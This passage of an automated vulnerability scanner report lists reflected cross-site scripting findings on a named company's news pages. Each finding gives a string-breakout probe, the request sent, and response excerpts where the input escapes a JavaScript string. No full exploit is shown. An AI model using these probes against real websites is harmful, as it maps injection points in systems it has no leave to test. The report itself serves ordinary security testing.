Last-Modified: Wed, 17 Nov 2010 00:50:49 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47225
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news5922e";3bdc27de435/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACT
...[SNIP]...

1.402. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db822'%3bf5c5bc32358 was submitted in the REST URL parameter 2. This input was echoed as db822';f5c5bc32358 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsdb822'%3bf5c5bc32358/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:01 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47225
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsdb822';f5c5bc32358/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.403. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20b5f'%3bf57f11cbcd was submitted in the REST URL parameter 3. This input was echoed as 20b5f';f57f11cbcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/20b5f'%3bf57f11cbcd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:46 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Date: Wed, 17 Nov 2010 00:51:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news/20b5f';f57f11cbcd'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.404. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1b4"%3bca9f7257cc was submitted in the REST URL parameter 3. This input was echoed as ad1b4";ca9f7257cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ad1b4"%3bca9f7257cc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:32 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49709
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ad1b4";ca9f7257cc";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.405. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccdab"%3bd652d54a16a was submitted in the REST URL parameter 1. This input was echoed as ccdab";d652d54a16a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutccdab"%3bd652d54a16a/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40826
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutccdab";d652d54a16a/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGO
...[SNIP]...

1.406. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99787'%3b1d90ba84956 was submitted in the REST URL parameter 1. This input was echoed as 99787';1d90ba84956 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about99787'%3b1d90ba84956/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40828
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about99787';1d90ba84956/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
v
...[SNIP]...

1.407. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16631'%3b7a0a23a0ffe was submitted in the REST URL parameter 2. This input was echoed as 16631';7a0a23a0ffe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news16631'%3b7a0a23a0ffe/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news16631';7a0a23a0ffe/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=
...[SNIP]...

1.408. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 867c1"%3b91184c7a196 was submitted in the REST URL parameter 2. This input was echoed as 867c1";91184c7a196 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news867c1"%3b91184c7a196/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47287
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news867c1";91184c7a196/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

/
...[SNIP]...

1.409. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ddc'%3bee89dceb24b was submitted in the REST URL parameter 3. This input was echoed as 29ddc';ee89dceb24b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/29ddc'%3bee89dceb24b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/29ddc';ee89dceb24b'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.410. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 941dc"%3b76efc0f0267 was submitted in the REST URL parameter 3. This input was echoed as 941dc";76efc0f0267 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/941dc"%3b76efc0f0267 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:26 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/941dc";76efc0f0267";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.411. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b651'%3bc37bef9bb91 was submitted in the REST URL parameter 1. This input was echoed as 5b651';c37bef9bb91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about5b651'%3bc37bef9bb91/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about5b651';c37bef9bb91/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.spl
...[SNIP]...

1.412. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6437d"%3bb9fb186b039 was submitted in the REST URL parameter 1. This input was echoed as 6437d";b9fb186b039 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6437d"%3bb9fb186b039/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about6437d";b9fb186b039/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="f
...[SNIP]...

1.413. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
